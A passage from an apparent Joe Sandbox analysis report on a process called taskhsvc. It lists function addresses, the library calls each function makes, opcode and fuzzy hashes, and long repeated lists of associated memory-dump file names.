Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 8b153fbba773a63a525c980d8b71d8941d817d7d0645de8e206053acb8b40cad
Instruction ID: 17aea553471b643bd1ed99ea49871a6feab9b88a25879780f8503269ae513c46
Opcode Fuzzy Hash: 8b153fbba773a63a525c980d8b71d8941d817d7d0645de8e206053acb8b40cad
Instruction Fuzzy Hash: A401C474A047069FDF10DFA9C985A6EB7F0FB1A314B154854E850EB325E334E905DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3842 Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EE2E50: abort.MSVCRT ref: 00EE2F7F

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: 57a493cc38c4ddf2902747f866e1658f2094fd219a67a7a600462a7c78d6a36d
Instruction ID: 8cba458f05bb3143c3f2fac0fa02a7acaff5b90f2f84c15dcab25300fdb8f647
Opcode Fuzzy Hash: 57a493cc38c4ddf2902747f866e1658f2094fd219a67a7a600462a7c78d6a36d
Instruction Fuzzy Hash: 381160B4D0420A9FCB40DFA9C585A9EBBF0FB0C310F00882AE858E3300E334AA058F65

Uniqueness

Uniqueness Score: -1.00%

Function 00EE9D53 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

Part of subcall function 00EE9C41: abort.MSVCRT ref: 00EE9C9A
Part of subcall function 00EE9C41: memset.MSVCRT ref: 00EE9D32
Part of subcall function 00EE9C41: __stack_chk_fail.LIBSSP-0 ref: 00EE9D4C

__stack_chk_fail.LIBSSP-0 ref: 00EE9DB3

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortmemset
String ID:
API String ID: 4248982965-0
Opcode ID: 8e2cefae297ef89dbcba802aab5691c7cb2b1f9247113be4da8631ccfd41f536
Instruction ID: 4b2f125e3f83d47bd6479d2f4bce8f2a0a03d04d74202903ed671916862240a8
Opcode Fuzzy Hash: 8e2cefae297ef89dbcba802aab5691c7cb2b1f9247113be4da8631ccfd41f536
Instruction Fuzzy Hash: 5B016CB8A0420A9FCB00DFA8C58599AFBF0FB09314B058556E918EB316E234E911DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00DB3D7A Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00DB3DE6

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 547b7be116288c0f04cc3f5a9e32db6362a4f0ac75d6210c445ce34fd2e34f9e
Instruction ID: 8e4374c7bbc683763d5b7a6058627bd2398a2eb69aa79bf8d9320645a432188a
Opcode Fuzzy Hash: 547b7be116288c0f04cc3f5a9e32db6362a4f0ac75d6210c445ce34fd2e34f9e
Instruction Fuzzy Hash: 630152B8E1020ACFCB00DFA9C585AAEF7F0FB08314F158455E915AB315D374EA059FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00EC2194 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EC2219

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: c3ce8272bb8ffb3f731d69cf561f43b746e3a93ec721852a2aaf7c9b2a8f5394
Instruction ID: 9a25f4250e3c9777b23cca2bb238480de14c52814ff59804e6fb17a6c4383c57
Opcode Fuzzy Hash: c3ce8272bb8ffb3f731d69cf561f43b746e3a93ec721852a2aaf7c9b2a8f5394
Instruction Fuzzy Hash: 520193B4915309AFCB04DFA8C585A9EBBF0EF48314F008519E9A8EB350D374A9058F91

Uniqueness

Uniqueness Score: -1.00%

Function 00EE3207 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EE3277

Part of subcall function 00EE2E50: abort.MSVCRT ref: 00EE2F7F

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
